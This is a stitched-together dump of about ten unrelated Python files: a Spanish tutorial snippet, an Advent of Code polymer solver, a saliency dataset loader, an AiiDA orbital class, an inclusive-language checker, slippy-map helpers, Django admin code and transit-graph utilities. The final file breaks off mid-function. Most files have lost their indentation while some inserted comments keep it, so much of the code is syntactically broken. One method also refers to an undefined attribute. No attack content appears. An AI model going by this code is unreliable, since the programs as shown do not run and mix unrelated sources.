print('sub')
|
def crear_usuario(n, a, e=5):  # the default value lets the argument be omitted; the '=' in a default must not have spaces around it
    return {
        'nombre': n,
        'apellido': a,
        'nombre_completo': "{} {}".format(n, a),
        'edad': e
    }
codi = crear_usuario(n="David", a="Lares")  # with keyword arguments there is no conflict (regardless of order)
print(codi['nombre'])
print(codi['apellido'])
print(codi['edad'])
|
#!/usr/bin/env python
from collections import defaultdict
sample = """NNCB
CH -> B
HH -> N
CB -> H
NH -> C
HB -> C
HC -> B
HN -> C
NN -> C
BH -> H
NC -> B
NB -> B
BN -> B
BB -> N
BC -> B
CC -> N
CN -> C"""
def parse(data):
template, rest = data.split("\n\n")
formula = {i[:2]: i[-1] for i in rest.split("\n")}
return template, formula
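# Explanatory note (added comment): building the polymer string explicitly
# would grow exponentially with the number of steps, so step() below tracks
# only how many times each adjacent pair occurs. Each rule AB -> C turns every
# "AB" pair into an "AC" and a "CB" pair and adds one "C" to the character
# frequencies, which is all that is needed for the max-minus-min answer.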
def step(template, formula, n):
pairs = {a + b: template.count(a + b) for
(a, b) in zip(template, template[1:])}
freq = defaultdict(int, {k: template.count(k) for k in set(template)})
for _ in range(n):
new_pairs = defaultdict(int)
for k, v in pairs.items():
new_pairs[k[0] + formula[k]] += v
new_pairs[formula[k] + k[1]] += v
freq[formula[k]] += v
pairs = new_pairs
return max(freq.values()) - min(freq.values())
if __name__ == "__main__":
template, formula = parse(sample)
s1 = step(template, formula, 10)
s2 = step(template, formula, 40)
print("sample1", s1, "INVALID" if s1 != 1588 else "")
print("sample2", s2, "INVALID" if s2 != 2188189693529 else "")
with open('input') as f:
data = f.read().strip()
template, formula = parse(data)
print("part1", step(template, formula, 10))
print("part2", step(template, formula, 40))
|
from enum import Enum
class TestSessionState(Enum):
"""An enumeration describing the possible states of a :class:`.TestSession`."""
IDLE = 1
"""The :class:`.TestSession` is idle and not running.
Configuration changes can occur during this state.
"""
RUNNING = 2
"""The :class:`.TestSession` is logging.
Configuration changes are not allowed during this state.
"""
INVALID_CONFIGURATION = 3
"""The project has a configuration error."""
NO_VALID_LOGGED_CHANNELS = 4
"""No channels have been configured, or all channels are disabled or not available."""
|
import os
import sys
import cv2
import numpy as np
from IPython import embed
from PIL import Image
from random import randint
from scipy import ndimage
import matplotlib.pylab as plt
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
size = (192, 256)
# BGR MODE
mean = [103.939, 116.779, 123.68]
PATH_SALICON = "/home/dataset/SALICON/"
def imageProcessing(image, saliency):
image = cv2.resize(image, (size[1], size[0]), interpolation=cv2.INTER_AREA).astype(np.float32)
saliency = cv2.resize(saliency, (size[1], size[0]), interpolation=cv2.INTER_AREA).astype(np.float32)
# remove mean value
image -= mean
    # Randomly apply one of four augmentations: horizontal flip, vertical
    # flip, 45-degree rotation (followed by the centre crop below), or none.
    augmentation = randint(0, 3)
    if augmentation == 0:
        # horizontal flip (width axis)
        image = image[:, ::-1, :]
        saliency = saliency[:, ::-1]
    elif augmentation == 1:
        # vertical flip (height axis)
        image = image[::-1, :, :]
        saliency = saliency[::-1, :]
    elif augmentation == 2:
        # rotate by 45 degrees; the crop below recovers a 192x256 window
        image = ndimage.rotate(image, 45)
        saliency = ndimage.rotate(saliency, 45)
sqr = image.shape[0]
start1 = int((sqr-192)/2)+1
end1 = sqr-int((sqr-192)/2)
start2 = int((sqr-256)/2)+1
end2 = sqr-int((sqr-256)/2)
image = image[start1:end1, start2:end2,:]
saliency = saliency[start1:end1, start2:end2]
# convert to torch Tensor
image = np.ascontiguousarray(image)
saliency = np.ascontiguousarray(saliency)
image = torch.FloatTensor(image)
# swap channel dimensions
image = image.permute(2,0,1)
return image,saliency
class SALICON(Dataset):
def __init__(self, mode='train', return_path=False, N=None):
global PATH_SALICON
self.size = (192, 256)
# MEAN IN BGR MODE
self.mean = [103.939, 116.779, 123.68]
# self.mean = [123.68, 116.779, 103.939]
self.path_dataset = PATH_SALICON
self.path_images = os.path.join(self.path_dataset,'image', 'images')
self.path_saliency = os.path.join(self.path_dataset, 'maps', mode)
self.return_path = return_path
# get list images
        list_names = os.listdir(os.path.join(self.path_dataset, 'fixations', mode))
list_names = np.array([n.split('.')[0] for n in list_names])
self.list_names = list_names
if N is not None:
self.list_names = list_names[:N]
# embed()
print("Init dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
# Image and saliency map paths
rgb_ima = os.path.join(self.path_images, self.list_names[index]+'.jpg')
sal_path = os.path.join(self.path_saliency, self.list_names[index]+'.png')
image = cv2.imread(rgb_ima)
saliency = cv2.imread(sal_path, 0)
return imageProcessing(image, saliency)
if __name__ == '__main__':
s = SALICON(mode='val', N=100)
image, saliency = s[0]
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""
Classes for describing atomic orbitals.
Contains general Orbital class.
For subclasses of Orbital, see submodules.
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import math
from aiida.common.exceptions import ValidationError, MissingPluginError
from aiida.plugins.factory import BaseFactory
class Orbital(object):
"""
Base class for Orbitals. Can handle certain basic fields, their setting
and validation. More complex Orbital objects should then inherit from
this class
:param position: the absolute position (three floats) units in angstrom
:param x_orientation: x,y,z unit vector defining polar angle theta
in spherical coordinates unitless
:param z_orientation: x,y,z unit vector defining azimuthal angle phi
in spherical coordinates unitless
:param orientation_spin: x,y,z unit vector defining the spin orientation
unitless
:param diffusivity: Float controls the radial term in orbital equation
units are reciprocal Angstrom.
:param module_name: internal parameter, stores orbital type
"""
#NOTE x_orientation, z_orientation, spin_orientation, diffusivity might
#all need to be moved to RealHydrogenOrbital
_base_fields = ('position',
'x_orientation',
'z_orientation',
'spin_orientation',
'diffusivity',
'module_name', # Actually, this one is system reserved
)
def __init__(self):
self._orbital_dict = {}
def __repr__(self):
module_name = self.get_orbital_dict()['module_name']
return '<{}: {}>'.format(module_name, str(self))
def __str__(self):
raise NotImplementedError
def _validate_keys(self, input_dict):
"""
        Checks all entries of input_dict and tries to validate them, to ensure
        that they have been properly set. Raises exceptions indicating any
        problems that arise during the validation.
        :param input_dict: a dictionary of inputs
        :return: input_dict: the original dictionary with all validated keys
                 now removed
:return: validated_dict: a dictionary containing all the input keys
which have now been validated.
"""
validated_dict = {}
for k in self._base_fields:
v = input_dict.pop(k, None)
if k == "module_name":
if v is None:
raise TypeError
try:
OrbitalFactory(v)
except (MissingPluginError, TypeError):
raise ValidationError("The module name {} was found to "
"be invalid".format(v))
if k == "position":
if v is None:
validated_dict.update({k: v})
continue
try:
v = list(float(i) for i in v)
if len(v) != 3:
raise ValueError
except (ValueError, TypeError):
raise ValueError("Wrong format for position, must be a"
" list of three float numbers.")
if "orientation" in k :
if v is None:
validated_dict.update({k: v})
continue
try:
v = list(float(i) for i in v)
if len(v) != 3:
raise ValueError
except (ValueError, TypeError):
raise ValueError("Wrong format for {}, must be a"
" list of three float numbers.")
            # From a spherical coordinate version of orientation
# try:
# v = tuple(float(i) for i in v)
# if len(v) != (2):
# raise ValueError
# if v[0] >= 2*math.pi or v[0] <= 0:
# raise ValueError
# if v[1] >= math.pi or v[1] <= 0:
# raise ValueError
# except(ValueError, TypeError):
# raise ValueError("Wrong format for {}, must be two tuples"
# " each having two floats theta, phi where"
# " 0<=theta<2pi and 0<=phi<=pi.".format(k))
if k == "diffusivity":
if v is None:
validated_dict.update({k: v})
continue
try:
v = float(v)
except ValueError:
raise ValidationError("Diffusivity must always be a float")
validated_dict.update({k: v})
return validated_dict
def set_orbital_dict(self, init_dict):
"""
Sets the orbital_dict, which can vary depending on the particular
implementation of this base class.
:param init_dict: the initialization dictionary
"""
if not isinstance(init_dict, dict):
raise Exception('You must supply a dict as an init')
# Adds the module_name in hard-coded manner
init_dict.update({"module_name": self._get_module_name()})
validated_dict = self._validate_keys(init_dict)
for k, v in validated_dict.items():
self._orbital_dict[k] = v
def get_orbital_dict(self):
"""
returns the internal keys as a dictionary
"""
output = {}
for k in self._default_fields:
try:
output[k] = self._orbital_dict[k]
except KeyError:
pass
return output
def _get_module_name(self):
"""
        Returns the module name (label) of the orbital, derived from the module path
"""
return self.__module__.split('.')[-1]
def OrbitalFactory(entry_point):
"""
Return the Orbital plugin class for a given entry point
:param entry_point: the entry point name of the Orbital plugin
"""
return BaseFactory('aiida.common.orbital', entry_point)
|
#!/usr/bin/env python
# Copyright 2020 The Amber Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Script to check files for inclusive language. The script will scan all files
and flag non-inclusive terminology which is identified.
Usage, run the script from a folder and the script will scan down through that
folder.
"""
import fnmatch
import os
import re
import sys
REGEXES = [
r"(?i)black[-_]?list",
r"(?i)white[-_]?list",
r"(?i)gr[ea]y[-_]?list",
r"(?i)(first class citizen)",
r"(?i)black[-_]?hat",
r"(?i)white[-_]?hat",
r"(?i)gr[ea]y[-_]?hat",
r"(?i)master",
r"(?i)slave",
r"(?i)\bhim\b",
r"(?i)\bhis\b",
r"(?i)\bshe\b",
r"(?i)\bher\b",
r"(?i)\bhers\b",
r"(?i)\bman\b",
r"(?i)\bwoman\b",
r"(?i)\she\s",
r"(?i)\she$",
r"(?i)^he\s",
r"(?i)^he$",
r"(?i)\she['|\u2019]d\s",
r"(?i)\she['|\u2019]d$",
r"(?i)^he['|\u2019]d\s",
r"(?i)^he['|\u2019]d$",
r"(?i)\she['|\u2019]s\s",
r"(?i)\she['|\u2019]s$",
r"(?i)^he['|\u2019]s\s",
r"(?i)^he['|\u2019]s$",
r"(?i)\she['|\u2019]ll\s",
r"(?i)\she['|\u2019]ll$",
r"(?i)^he['|\u2019]ll\s",
r"(?i)^he['|\u2019]ll$",
r"(?i)grandfather",
r"(?i)\bmitm\b",
r"(?i)\bcrazy\b",
r"(?i)\binsane\b",
r"(?i)\bblind\sto\b",
r"(?i)\bflying\sblind\b",
r"(?i)\bblind\seye\b",
r"(?i)\bcripple\b",
r"(?i)\bcrippled\b",
r"(?i)\bdumb\b",
r"(?i)\bdummy\b",
r"(?i)\bparanoid\b",
r"(?i)\bsane\b",
r"(?i)\bsanity\b",
r"(?i)red[-_]?line",
]
SUPPRESSIONS = [
r"(?i)MS_SLAVE",
r"(?i)man[ -_]?page",
]
REGEX_LIST = []
for reg in REGEXES:
REGEX_LIST.append(re.compile(reg))
SUPPRESSION_LIST = []
for supp in SUPPRESSIONS:
SUPPRESSION_LIST.append(re.compile(supp))
def find(top, filename_glob, skip_glob_list):
"""Returns files in the tree rooted at top matching filename_glob but not
in directories matching skip_glob_list."""
file_list = []
for path, dirs, files in os.walk(top):
for glob in skip_glob_list:
for match in fnmatch.filter(dirs, glob):
dirs.remove(match)
for filename in fnmatch.filter(files, filename_glob):
if filename == os.path.basename(__file__):
continue
file_list.append(os.path.join(path, filename))
return file_list
def filtered_descendants(glob):
"""Returns glob-matching filenames under the current directory, but skips
some irrelevant paths."""
return find('.', glob, ['third_party', 'external', 'build*', 'out*',
'CompilerIdCXX', '.git'])
def check_match(filename, contents):
"""Check if contents contains any matching entries"""
ret = False
for reg in REGEX_LIST:
match = reg.search(contents)
if match:
suppressed = False
for supp in SUPPRESSION_LIST:
idx = match.start()
supp_match = supp.match(contents[idx:])
if supp_match:
suppressed = True
                # This is a hack to handle the MS_ prefix that needs to be
                # checked for. Find a better way if we add more suppressions
                # that modify the prefix of the string.
if idx >= 3:
supp_match = supp.match(contents[idx - 3:])
if supp_match:
suppressed = True
if not suppressed:
# No matching suppression.
print("{}: found non-inclusive language: {}".format(
filename, match.group(0)))
ret = True
return ret
def alert_if_lang_matches(glob):
"""Prints names of all files matching non-inclusive language.
Finds all glob-matching files under the current directory and checks if they
contain the language pattern. Prints the names of all the files that
match.
Returns the total number of file names printed.
"""
verbose = False
printed_count = 0
for file in filtered_descendants(glob):
has_match = False
try:
with open(file, 'r', encoding='utf8') as contents:
if check_match(file, contents.read()):
printed_count += 1
except:
if verbose:
print("skipping {}".format(file))
return printed_count
def main():
globs = ['*']
count = 0
for glob in globs:
count += alert_if_lang_matches(glob)
sys.exit(count > 0)
if __name__ == '__main__':
main()
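# Illustrative usage note (not part of the original script): run the script
# from the root of a checkout; it exits with a non-zero status when any
# non-inclusive term is found, so it can serve as a CI gate.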
|
import os
import time
import torch
# --- Data ---
TARGET = ['Meara', 'BarChartLit'][0]
SEC = 1
# DATASET_NAME = "{} ({} sec)".format(TARGET, SEC)
DATASET_NAME = "confusion"
PATH_TO_DATASET = os.path.join("dataset", DATASET_NAME)
PATH_TO_SEQS = os.path.join(PATH_TO_DATASET, "sequences")
MAX_SEQ_LEN = 150
TRUNCATION_SIDE = ['head', 'tail'][0]
# -- Network --
INPUT_SIZE = 14
OUTPUT_SIZE = 2
HIDDEN_SIZE = 256
BIDIRECTIONAL = False
NUM_LAYERS = 1
DROPOUT = 0.0
RNN_TYPE = "GRU"
# --- Training ---
K = 10
NUM_REPETITIONS = 1
EPOCHS = 100
LEARNING_RATE = 0.00003
BATCH_SIZE = 128
PATH_TO_LOG = os.path.join("logs", "attention_rnn_" + str(time.time()))
PATH_TO_PRETRAINED = os.path.join("trained_models", "confusion")
# --- Device ---
if not torch.cuda.is_available():
print("WARNING: running on CPU since GPU is not available")
DEVICE = torch.device("cpu")
else:
DEVICE = torch.device(0)
|
"""Contains functions dealing with geolocation. This is mostly used for finding
coordinates from Slippy Map tiles and vice versa. Slippy Map tiles are used in
aerial imagery APIs.
For more information (and for the source of some of these functions) see
https://wiki.openstreetmap.org/wiki/Slippy_map_tilenames
"""
import math
def deg_to_tile(lat_deg, lon_deg, zoom):
"""Converts coordinates into the nearest x,y Slippy Map tile"""
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad)))
/ math.pi) / 2.0 * n)
return (xtile, ytile)
def tile_to_deg(xtile, ytile, zoom):
"""Returns the coordinates of the northwest corner of a Slippy Map
x,y tile"""
n = 2.0 ** zoom
lon_deg = xtile / n * 360.0 - 180.0
lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))
lat_deg = math.degrees(lat_rad)
return (lat_deg, lon_deg)
def deg_to_tilexy(lat_deg, lon_deg, zoom):
"""Converts geocoordinates to an x,y position on a tile."""
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
x = ((lon_deg + 180.0) / 360.0 * n)
y = ((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad)))
/ math.pi) / 2.0 * n)
return (int((x % 1) * 256), int((y % 1) * 256))
def deg_to_tilexy_matrix(lat_deg, lon_deg, zoom, center_tile_xoffset = 1, center_tile_yoffset = 1):
"""Converts geocoordinates to an x,y position on a tile matrix.
For a 3x3 tile matrix, the image used is the center tile, so pass
1 for center_tile_xoffset and 1 for center_tile_yoffset"""
x, y = deg_to_tilexy(lat_deg, lon_deg, zoom)
return (256 * center_tile_xoffset + x, 256 * center_tile_yoffset + y)
def tilexy_to_deg(xtile, ytile, zoom, x, y):
"""Converts a specific location on a tile (x,y) to geocoordinates."""
decimal_x = xtile + x / 256
decimal_y = ytile + y / 256
n = 2.0 ** zoom
lon_deg = decimal_x / n * 360.0 - 180.0
lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * decimal_y / n)))
lat_deg = math.degrees(lat_rad)
return (lat_deg, lon_deg)
def tilexy_to_absxy(xtile, ytile, zoom, x, y):
"""Convert x,y on a tile to absolute x,y coordinates."""
return (xtile * 256 + x, ytile * 256 + y)
def absxy_to_tilexy(xtile, ytile, zoom, abs_x, abs_y):
"""Convert absolute x,y coordinates to tile x,y coordinates."""
return (abs_x - xtile * 256, abs_y - ytile * 256)
def deg_to_absxy(lat_deg, lon_deg, zoom):
"""Convert lat/long to absolute x,y"""
tilex, tiley = deg_to_tile(lat_deg, lon_deg, zoom)
tilex *= 256
tiley *= 256
x, y = deg_to_tilexy(lat_deg, lon_deg, zoom)
tilex += x
tiley += y
return (tilex, tiley)
def absxy_to_deg(abs_x, abs_y, zoom):
"""Convert absolute x,y to lat/long."""
lat, lon = tilexy_to_deg(int(abs_x / 256), int(abs_y / 256), zoom, abs_x % 256, abs_y % 256)
return (lat, lon)
def tilexy_to_deg_matrix(xtile, ytile, zoom, x, y, center_tile_xoffset = 1, center_tile_yoffset = 1):
"""Converts an x,y position on a tile matrix to geocoordinates.
For a 3x3 tile matrix, the image used is the center tile, so pass
1 for center_tile_xoffset and 1 for center_tile_yoffset"""
return tilexy_to_deg(xtile - center_tile_xoffset, ytile - center_tile_yoffset, zoom, x, y)
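# Illustrative usage sketch (not part of the original module); the coordinate
# and zoom level below are arbitrary values chosen for demonstration.
if __name__ == '__main__':
    lat, lon, zoom = 40.7506, -73.9935, 15
    xtile, ytile = deg_to_tile(lat, lon, zoom)
    nw_lat, nw_lon = tile_to_deg(xtile, ytile, zoom)
    print('tile:', (xtile, ytile), 'northwest corner:', (nw_lat, nw_lon))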
|
from django.contrib import admin
from site_settings.models import SiteSettings
class SingletonModelAdmin(admin.ModelAdmin):
"""Prevent deletion or adding rows"""
actions = None
def has_add_permission(self, request, obj=None):
return False
def has_delete_permission(self, request, obj=None):
return False
@admin.register(SiteSettings)
class SiteSettingsAdmin(SingletonModelAdmin):
def planning_file_link(self, obj):
if obj.file:
return "<a href='%s'>download</a>" % (obj.file.url,)
else:
return "No attachment"
|
import logging as lg
import random
import string
import warnings
from typing import List, Tuple
import geopandas as gpd
import networkx as nx
import numpy as np
import pandas as pd
from shapely.geometry import LineString, Point
from .utilities import log
def great_circle_vec(lat1: float,
lng1: float,
lat2: float,
lng2: float,
earth_radius: float=6371009.0) -> float:
"""
Vectorized function to calculate the great-circle distance between two
points or between vectors of points.
Please note that this method is copied from OSMnx method of the same name,
which can be accessed here:
https://github.com/gboeing/osmnx/blob/
b32f8d333c6965a0d2f27c1f3224a29de2f08d55/osmnx/utils.py#L262
Parameters
----------
lat1 : float or array of float
lng1 : float or array of float
lat2 : float or array of float
lng2 : float or array of float
earth_radius : numeric
radius of earth in units in which distance will be returned (default is
meters)
Returns
-------
distance : float
distance or vector of distances from (lat1, lng1) to (lat2, lng2) in
units of earth_radius
"""
phi1 = np.deg2rad(90 - lat1)
phi2 = np.deg2rad(90 - lat2)
theta1 = np.deg2rad(lng1)
theta2 = np.deg2rad(lng2)
cos = (np.sin(phi1) * np.sin(phi2) * np.cos(theta1 - theta2)
+ np.cos(phi1) * np.cos(phi2))
# Ignore warnings during this calculation because numpy warns it cannot
# calculate arccos for self-loops since u==v
with warnings.catch_warnings():
warnings.simplefilter('ignore')
arc = np.arccos(cos)
# Return distance in units of earth_radius
distance = arc * earth_radius
return distance
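# Note (added comment, not part of the original): the expression above is the
# spherical law of cosines written in terms of colatitudes; because it uses
# numpy ufuncs, passing array-valued coordinates computes all distances
# element-wise in a single vectorized call.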
def generate_random_name(N: int=5):
choices = (string.ascii_uppercase + string.digits)
return ''.join(random.SystemRandom().choice(choices) for _ in range(N))
def generate_graph_node_dataframe(G):
# This method breaks out a portion of a similar method from
# OSMnx's get_nearest_node; source:
# https://github.com/gboeing/osmnx/blob/
# b32f8d333c6965a0d2f27c1f3224a29de2f08d55/osmnx/utils.py#L326
if not G or (G.number_of_nodes() == 0):
        raise ValueError('G argument must not be empty and '
                         'should contain at least one node')
# Dump graph node coordinates array
clist = []
for node, data in G.nodes(data=True):
        # Ensure that each item is cast to the correct type
x = float(data['x'])
y = float(data['y'])
clist.append([node, x, y])
#coords = np.array(clist)
coords = np.array(clist, dtype='O')
# Then make into a Pandas DataFrame, with the node as index (type string)
df = pd.DataFrame(coords, columns=['node', 'x', 'y'])
#df['node'] = df['node'].astype(str)
df = df.set_index('node')
return df
def get_nearest_nodes(df_orig: pd.DataFrame,
point: Tuple[float, float],
connection_threshold: float,
exempt_id: str=None):
# This method breaks out a portion of a similar method from
# OSMnx's get_nearest_node; source:
# https://github.com/gboeing/osmnx/blob/
# b32f8d333c6965a0d2f27c1f3224a29de2f08d55/osmnx/utils.py#L326
# Make a copy of the DataFrame to prevent mutation outside of function
df = df_orig.copy()
if exempt_id is not None:
#df.index = df.index.astype(str)
mask = ~(df.index == exempt_id)
df = df[mask]
# Add second column of reference points
df['reference_y'] = point[0]
df['reference_x'] = point[1]
    # TODO: OSMnx supports euclidean distance as well; for now we have a
    # stripped-down version of this same function
# Ensure each vectorized series is typed correctly
ref_ys = df['reference_y'].astype(float)
ref_xs = df['reference_x'].astype(float)
ys = df['y'].astype(float)
xs = df['x'].astype(float)
# Calculate distance vector using great circle distances (ie, for
# spherical lat-long geometries)
distances = great_circle_vec(lat1=ref_ys,
lng1=ref_xs,
lat2=ys,
lng2=xs)
# Filter out nodes outside connection threshold
mask = (distances < connection_threshold)
nearest_nodes = distances[mask]
# Return filtered series
return nearest_nodes
def nan_helper(y):
"""
Helper to handle indices and logical indices of NaNs.
From: https://stackoverflow.com/questions/6518811/
interpolate-nan-values-in-a-numpy-array#6518811
Input:
- y, 1d numpy array with possible NaNs
Output:
- nans, logical indices of NaNs
- index, a function, with signature indices= index(logical_indices),
to convert logical indices of NaNs to 'equivalent' indices
Example:
>>> # linear interpolation of NaNs
>>> nans, x= nan_helper(y)
>>> y[nans]= np.interp(x(nans), x(~nans), y[~nans])
"""
return (np.isnan(y), lambda z: z.to_numpy().nonzero()[0])
def reproject(G: nx.MultiDiGraph, to_epsg: int=2163) -> nx.MultiDiGraph:
# Avoid upstream mutation of the graph
G = G.copy()
# First extract current crs
orig_crs = G.graph['crs']
# And get the array of nodes from original graph
ref_node_array = list(G.nodes(data=True))
all_pts = []
for i, node in ref_node_array:
all_pts.append(Point(node['x'], node['y']))
# Convert the collected nodes to GeoSeries
gs = gpd.GeoSeries(all_pts)
# And then reproject from original crs to new
gs.crs = orig_crs
gs = gs.to_crs(epsg=to_epsg)
# Now iterate back through the reprojected points
    # and add each to its respective node
for (i, node), new_pt in zip(ref_node_array, gs):
G.nodes[i]['x'] = new_pt.x
G.nodes[i]['y'] = new_pt.y
# Update the graph's coordinate reference
G.graph['crs'] = {'init': 'epsg:{}'.format(to_epsg)}
# Return the reprojected copy
return G
def coalesce(
G_orig: nx.MultiDiGraph,
resolution: float,
edge_summary_method=lambda x: x.max(),
boarding_cost_summary_method=lambda x: x.mean(),
) -> nx.MultiDiGraph:
# Note: Feature is experimental. For more details, see
# https://github.com/kuanb/peartree/issues/126
warnings.warn((
'coalesce method is experimental - method risks '
'deformation of relative graph structure'))
# Make sure our resolution satisfies basic requirement
if resolution < 1:
raise ValueError('Resolution parameters must be >= 1')
# Avoid upstream mutation of the graph
G = G_orig.copy()
    # Before we continue, attempt to simplify the current network
# such that we won't generate isolated nodes that become disconnected
# from key coalesced nodes (because too many intermediary nodes)
G = simplify_graph(G)
# Extract all x, y values
grouped = {}
for i, node in G.nodes(data=True):
x = (round(node['x'] / resolution) * resolution)
y = (round(node['y'] / resolution) * resolution)
# Build the dictionary as needed
if x not in grouped:
grouped[x] = {}
if y not in grouped[x]:
grouped[x][y] = []
# Append each node under its approx. area grouping
grouped[x][y].append(i)
# Generate a series of reference dictionaries that allow us
# to assign a new node name to each grouping of nodes
counter = 0
new_node_coords = {}
lookup = {}
# Populate the fresh reference dictionaries
for x in grouped:
for y in grouped[x]:
new_node_name = '{}_{}'.format(G.name, counter)
new_node_coords[new_node_name] = {'x': x, 'y': y}
            # Pair each newly generated name to the original node id,
# preserved from the original groupings resulting array
for n in grouped[x][y]:
lookup[n] = new_node_name
# Update the counter so each new synthetic
# node name will be different
counter += 1
# Recast the lookup crosswalk as a series for convenience
reference = pd.Series(lookup)
# Get the following attributes:
# 1. average boarding cost for each node grouping
# 2. modes associated with each node grouping
for nni in new_node_coords:
# Initialize an empty list
boarding_costs = []
all_modes_related = []
# Get all original nodes that have been grouped
g_nodes = reference.loc[reference == nni].index.values
        # Iterate through and gather boarding costs
for i in g_nodes:
specific_node = G.nodes[i]
bc = specific_node['boarding_cost']
boarding_costs.append(bc)
this_nodes_modes = specific_node['modes']
all_modes_related.extend(this_nodes_modes)
# Calculate the summary boarding costs
# and assign it to the new nodes objects
new_node_coords[nni]['boarding_cost'] = (
boarding_cost_summary_method(np.array(boarding_costs)))
# Get all unique modes and assign it to the new nodes objects
sorted_set_list = sorted(list(set(all_modes_related)))
new_node_coords[nni]['modes'] = sorted_set_list
# First step to creating a list of replacement edges
replacement_edges_fr = []
replacement_edges_to = []
replacement_edges_len = []
for n1, n2, edge in G.edges(data=True):
# This will be used to parse out which edges to keep
replacement_edges_fr.append(reference[n1])
replacement_edges_to.append(reference[n2])
replacement_edges_len.append(edge['length'])
# This takes the resulting matrix and converts it to a pandas DataFrame
edges_df = pd.DataFrame({
'fr': replacement_edges_fr,
'to': replacement_edges_to,
'len': replacement_edges_len})
# Next we group by the edge pattern (from -> to)
grouped = edges_df.groupby(['fr', 'to'], sort=False)
# With the resulting groupings, we extract values
# TODO: Also group on modes
processed_edge_costs = edge_summary_method(grouped['len'])
# Second step; which uses results from edge_df grouping/parsing
edges_to_add = []
for n1, n2, edge in G.edges(data=True):
# Get corresponding ids of new nodes (grid corners)
ref_n1 = reference[n1]
ref_n2 = reference[n2]
# Retrieve pair value from previous grouping operation
avg_length = processed_edge_costs.loc[ref_n1, ref_n2]
edges_to_add.append((
ref_n1,
ref_n2,
avg_length,
edge['mode']))
# Add the new edges to graph
for n1, n2, length, mode in edges_to_add:
        # Only add the edge if it has not been added yet
if G.has_edge(n1, n2):
continue
# Also avoid edges that now connect to the same node
if n1 == n2:
continue
G.add_edge(n1, n2, length=length, mode=mode)
# Now we can remove all edges and nodes that predated the
# coalescing operations
for n in reference.index:
# Note that this will also drop all edges
G.remove_node(n)
# Also make sure to update the new nodes with their summary
# stats and locational data
for i, node in new_node_coords.items():
if G.has_node(i):
# For all other nodes, preserve them by re-populating
for key in node:
G.nodes[i][key] = node[key]
return G
def _path_has_consistent_mode_type(G, path):
# Makes sure that no mixed transit+walk network components
# made it through the get_paths... method - we do not want to
# mix modes during the simplification process
path_modes = []
for u, v in zip(path[:-1], path[1:]):
edge_count = G.number_of_edges(u, v)
for i in range(edge_count):
edge = G.edges[u, v, i]
path_modes.append(edge['mode'])
path_clear = all(x == path_modes[0] for x in path_modes)
return path_clear
def is_endpoint(G: nx.Graph, node: int, strict=True):
"""
Return True if the node is a "real" endpoint of an edge in the network, \
otherwise False. OSM data includes lots of nodes that exist only as \
points to help streets bend around curves. An end point is a node that \
either: \
1) is its own neighbor, ie, it self-loops. \
2) or, has no incoming edges or no outgoing edges, ie, all its incident \
edges point inward or all its incident edges point outward. \
3) or, it does not have exactly two neighbors and degree of 2 or 4. \
4) or, if strict mode is false, if its edges have different OSM IDs.
Please note this method is taken directly from OSMnx, and can be found in \
its original form, here: \
https://github.com/gboeing/osmnx/blob/ \
c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py#L22-L88
Parameters
----------
G : networkx multidigraph
The NetworkX graph being evaluated
node : int
The node to examine
strict : bool
If False, allow nodes to be end points even if they fail all other \
rules but have edges with different OSM IDs
Returns
-------
bool
Indicates whether or not the node is indeed an endpoint
"""
neighbors = set(list(G.predecessors(node)) + list(G.successors(node)))
n = len(neighbors)
d = G.degree(node)
if node in neighbors:
# If the node appears in its list of neighbors, it self-loops. this is
# always an endpoint.
return True
# If node has no incoming edges or no outgoing edges, it must be an
# endpoint
elif G.out_degree(node) == 0 or G.in_degree(node) == 0:
return True
elif not (n == 2 and (d == 2 or d == 4)):
# Else, if it does NOT have 2 neighbors AND either 2 or 4 directed
# edges, it is an endpoint. either it has 1 or 3+ neighbors, in which
# case it is a dead-end or an intersection of multiple streets or has
# 2 neighbors but 3 degree (indicating a change from oneway to twoway)
# or more than 4 degree (indicating a parallel edge) and thus is an
# endpoint
return True
elif not strict:
# Non-strict mode
osmids = []
# Add all the edge OSM IDs for incoming edges
for u in G.predecessors(node):
for key in G[u][node]:
osmids.append(G.edges[u, node, key]['osmid'])
# Add all the edge OSM IDs for outgoing edges
for v in G.successors(node):
for key in G[node][v]:
osmids.append(G.edges[node, v, key]['osmid'])
# If there is more than 1 OSM ID in the list of edge OSM IDs then it is
# an endpoint, if not, it isn't
return len(set(osmids)) > 1
else:
# If none of the preceding rules returned true, then it is not an
# endpoint
return False
def build_path(
G: nx.Graph,
node: int,
endpoints: List[int],
path: List[int]) -> List[int]:
"""
Recursively build a path of nodes until you hit an endpoint node.
Please note this method is taken directly from OSMnx, and can be found in \
its original form, here: \
https://github.com/gboeing/osmnx/blob/ \
c5916aab5c9b94c951c8fb1964c841899c9467f8/osmnx/simplify.py#L91-L131
Parameters
----------
G : networkx multidigraph
node : int
the current node to start from
endpoints : set
the set of all nodes in the graph that are endpoints
path : list
the list of nodes in order in the path so far
Returns
-------
paths_to_simplify : list
"""
# For each successor in the passed-in node
for successor in G.successors(node):
if successor not in path:
# If successor is already in path, ignore it, otherwise add to path
path.append(successor)
if successor not in endpoints:
# If successor not endpoint, recursively call
# build_path until endpoint found
path = build_path(G, successor, endpoints, path)
else:
